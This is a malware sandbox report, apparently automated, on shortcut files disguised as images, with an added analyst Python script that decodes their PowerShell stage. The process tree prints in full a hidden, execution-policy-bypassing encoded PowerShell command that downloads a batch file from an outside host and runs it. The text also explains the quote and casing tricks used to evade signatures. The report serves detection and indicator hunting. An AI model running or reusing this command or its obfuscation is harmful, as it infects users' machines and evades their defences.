Analysis
max time kernel: 120s
max time network: 120s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 31/01/2024, 08:13
Static task: static1
Behavioral task: behavioral1
  Sample: Image012.png.lnk
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: Image012.png.lnk
  Resource: win10v2004-20231222-en
Behavioral task: behavioral3
  Sample: Photo01.jpg.lnk
  Resource: win7-20231129-en
Behavioral task: behavioral4
  Sample: Photo01.jpg.lnk
  Resource: win10v2004-20231215-en
Behavioral task: behavioral5
  Sample: Photo02.jpg.lnk
  Resource: win7-20231215-en
Behavioral task: behavioral6
  Sample: Photo02.jpg.lnk
  Resource: win10v2004-20231215-en
General
Target: Image012.png.lnk
Size: 2KB
MD5: 395be4940bf35809d5bcfe58646b278c
SHA1: 02b01088e3bb584641281c36118c930f3c9b963d
SHA256: 4c5fe2c863349aa4f43dd9f9f932dac11576832a12bc5e84b840c09c1308f540
SHA512: 9add65f4de5ef386b7191ac869ca1801dcdd9525189fdb94a5d86c82c4c51d983e3966ef148f392d48382588ed8882ea25120dcbd6bc8d8a7e63e362e6b2929b
Malware Config
Signatures
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   process
  2720  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  2720  powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   process   procid_target
  PID 2652 wrote to memory of 2768   2652  cmd.exe   29
  PID 2652 wrote to memory of 2768   2652  cmd.exe   29
  PID 2652 wrote to memory of 2768   2652  cmd.exe   29
  PID 2768 wrote to memory of 2720   2768  cmd.exe   30
  PID 2768 wrote to memory of 2720   2768  cmd.exe   30
  PID 2768 wrote to memory of 2720   2768  cmd.exe   30
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk
   PID: 2652
   Signatures: Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" Cmd /C pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g
      PID: 2768
      Signatures: Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g
         PID: 2720
         Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
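Decoding the PowerShell stage above. This is an added analyst example, not part of the sandbox report: the only input is the Base64 argument of -eC copied verbatim from the process tree, and the function names are mine. The switches are unambiguous prefixes that powershell.exe accepts: -EX bYPASs is -ExecutionPolicy Bypass, -NOp is -NoProfile, -W hiDDEN is -WindowStyle Hidden, and -eC is -EncodedCommand, which takes Base64 over UTF-16LE. The decoded script also uses U+201D curly quotes as string delimiters (PowerShell's tokenizer accepts them), tab padding and random casing, which is cheap obfuscation aimed at signatures on ASCII quotes and fixed-case cmdlet names. The code decodes the argument, folds that obfuscation, and pulls out the download URL and the dropped file path.

```python
import base64
import re

# Base64 argument of -eC, copied verbatim from the sandbox process tree above
# (split across lines only for readability).
ENCODED_COMMAND = (
    "IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0g"
    "aAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0g"
    "IAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAA"
    "SQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g"
)

# PowerShell's tokenizer accepts these Unicode quotes as string delimiters, so
# operators use them to evade signatures that look for ASCII quotes.
SMART_QUOTES = str.maketrans({
    "\u201c": '"', "\u201d": '"', "\u201e": '"',
    "\u2018": "'", "\u2019": "'", "\u201a": "'", "\u201b": "'",
})


def decode_encoded_command(b64: str) -> str:
    """Decode a powershell.exe -EncodedCommand argument: Base64 over UTF-16LE.

    Padding is restored because the argument is often copied out of a process
    listing with its trailing '=' characters missing.
    """
    b64 = "".join(b64.split())            # drop stray whitespace/newlines
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-16-le")


def normalize(script: str) -> str:
    """Undo the cheap obfuscation in this sample: curly quotes, tab padding
    and random casing of cmdlet and parameter names."""
    script = script.translate(SMART_QUOTES)
    script = re.sub(r"[ \t]+", " ", script).strip()
    # Cmdlets and parameters are case-insensitive in PowerShell, so fold case
    # outside double-quoted strings only; URL and path literals stay untouched.
    parts = script.split('"')
    parts[0::2] = [p.lower() for p in parts[0::2]]
    return '"'.join(parts)


def extract_iocs(script: str) -> dict:
    """Pull the download URL and dropped-file paths out of a normalized script."""
    urls = re.findall(r"https?://[^\s\"']+", script)
    paths = re.findall(r"\$env:temp\\[^\s\"']+", script, flags=re.IGNORECASE)
    return {
        "urls": sorted(set(urls)),
        "dropped_files": sorted({p.lower() for p in paths}),
    }


def analyze(b64: str) -> dict:
    """Full pipeline: decode, normalize, extract."""
    decoded = decode_encoded_command(b64)
    normalized = normalize(decoded)
    return {"decoded": decoded, "normalized": normalized, **extract_iocs(normalized)}


if __name__ == "__main__":
    result = analyze(ENCODED_COMMAND)
    print("decoded   :", repr(result["decoded"]))
    print("normalized:", result["normalized"])
    print("urls      :", result["urls"])
    print("dropped   :", result["dropped_files"])
```

Normalized, the script is an Invoke-WebRequest of http://vybsnf3.sa.com/med.bat to $env:TEMP\jrbbsfr.bat followed by Invoke-Item on that file, i.e. a second-stage batch downloader. The process tree shows no child under powershell.exe (PID 2720), which is consistent with the download not completing in this run; the URL and the %TEMP% file name are still the indicators worth hunting for.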